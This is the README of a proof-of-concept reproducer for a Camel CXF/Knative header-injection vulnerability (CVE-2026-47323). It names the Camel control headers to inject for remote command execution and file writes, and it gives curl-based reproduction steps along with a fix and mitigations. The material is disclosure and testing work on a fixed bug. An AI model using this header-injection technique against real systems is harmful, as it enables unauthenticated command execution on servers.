## https://sploitus.com/exploit?id=61BD1FA8-6BCC-5A0F-BC5B-4FBBB8AD94E1
# camel-cxf-rest / camel-cxf / camel-knative-http Header Injection Reproducer (CVE-2026-47323)
This project demonstrates a **message-header injection** in Apache Camel's CXF and Knative HTTP header-filter
strategies, tracked as **CVE-2026-47323**. `CxfRsHeaderFilterStrategy` (camel-cxf-rest), `CxfHeaderFilterStrategy`
(camel-cxf-transport) and `KnativeHttpHeaderFilterStrategy` (camel-knative-http) only filter **outbound**
Camel-internal headers (`setOutFilterStartsWith`), while **not** configuring **inbound** filtering
(`setInFilterStartsWith`). As a result, an unauthenticated attacker can inject Camel-internal headers (e.g.
`CamelExecCommandExecutable`, `CamelFileName`) via HTTP requests to CXF-RS or CXF-SOAP endpoints. When a route
forwards messages from these endpoints to header-driven components such as camel-exec or camel-file, the injected
headers override the configured values โ enabling **remote code execution** or arbitrary file writes.
This PoC uses the **CXF-RS (JAX-RS)** surface: an injected `CamelExecCommandExecutable` turns a harmless
`echo` into arbitrary command execution.
Advisory: https://camel.apache.org/security/CVE-2026-47323.html
## Vulnerability Summary
| Property | Value |
|----------|-------|
| **Component** | `camel-cxf-rest` (`CxfRsHeaderFilterStrategy`), `camel-cxf-transport` (`CxfHeaderFilterStrategy`), `camel-knative-http` (`KnativeHttpHeaderFilterStrategy`) |
| **CWE** | CWE-20: Improper Input Validation |
| **Impact** | Inject Camel control headers via an HTTP request โ override a downstream header-driven producer โ RCE (camel-exec) or arbitrary file write (camel-file) |
| **Preconditions** | A CXF-RS / CXF-SOAP / Knative endpoint forwarding to a header-driven producer; unauthenticated when the endpoint is |
| **Affected Versions** | From 3.18.0 before 4.14.6, from 4.15.0 before 4.18.2, 4.19.0 (fixed in 4.19.0) |
| **Fixed Versions** | 4.14.6, 4.18.2, 4.19.0 |
| **Credit** | Quac Tran |
> This reproducer pins camel **4.18.1** โ the last affected release on the 4.18.x line (the fix landed in 4.18.2).
> Same pattern as camel-undertow (CVE-2025-30177), the broader incoming-header filter (CVE-2025-27636,
> CVE-2025-29891) and the non-HTTP strategies (CVE-2026-40453).
## Technical Details
```java
// CxfRsHeaderFilterStrategy.initialize() (affected 4.18.1) โ only the OUTBOUND filter is configured:
setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
// (no setInFilterStartsWith(...), so inbound Camel* headers are NOT filtered)
// DefaultCxfRsBinding.populateExchangeFromCxfRsRequest() โ inbound HTTP headers copied through the strategy:
for (Map.Entry> entry : headers.entrySet()) {
if (headerFilterStrategy.applyFilterToExternalHeaders(entry.getKey(), entry.getValue(), camelExchange)
|| entry.getValue().isEmpty()) {
// dropped โ but with no inbound filter, CamelExecCommandExecutable is NOT dropped
} else {
camelMessage.setHeader(entry.getKey(), entry.getValue().get(0)); // exec:echo
โ โโโ ExploitController.java # attacker: GET /ping with injected CamelExec* headers
โโโ resources/
โโโ application.properties
```
## Prerequisites
- Java 17+ and Maven 3.8+
- Docker (optional, for the containerised run)
## Reproduction Steps
### Option A โ Docker (recommended)
```bash
mvn clean package -DskipTests
docker compose up -d --build
curl -s http://localhost:8080/exploit/attack
docker exec cve-2026-47323 ls -l /tmp/pwned # created by the injected command
docker compose down
```
### Option B โ run the jar directly
```bash
mvn clean package -DskipTests
java -jar target/cve-2026-47323-cxfrs-0.0.1-SNAPSHOT.jar &
curl -s http://localhost:8080/exploit/attack
ls -l /tmp/pwned
```
### Expected output
```
marker before: false
=== 1) Legitimate request (no injected headers) ===
response: ok
marker created: false
=== 2) Injected CamelExecCommandExecutable=/usr/bin/touch CamelExecCommandArgs=/tmp/pwned ===
response: ok
marker created: true
>>> Header-injection / RCE proof โ an unauthenticated HTTP client made the route run an
>>> arbitrary command by injecting CamelExec* headers into a CXF-RS request (touch /tmp/pwned): true
```
## Attack Vectors
Any route that forwards messages from a CXF-RS, CXF-SOAP or Knative-HTTP endpoint to a header-driven producer.
Beyond `CamelExecCommandExecutable` (RCE via camel-exec), `CamelFileName` allows arbitrary file writes via
camel-file, and other `Camel*` control headers can steer other producers.
## Recommended Fix
Upgrade to **4.14.6 / 4.18.2 / 4.19.0**. The affected strategies then configure
`setInFilterStartsWith(CAMEL_FILTER_STARTS_WITH)`, dropping inbound `Camel*` headers.
## Mitigation
Until upgrading, strip the Camel control headers from inbound messages before any downstream producer
(`.removeHeaders("Camel*")` and `.removeHeaders("camel*")` at the start of the route), and require authentication
on the CXF / Knative endpoint.
## Disclaimer
This reproducer is provided for **security research and authorized testing only**, for a **publicly disclosed
and fixed** vulnerability. Do not use it against systems without explicit permission.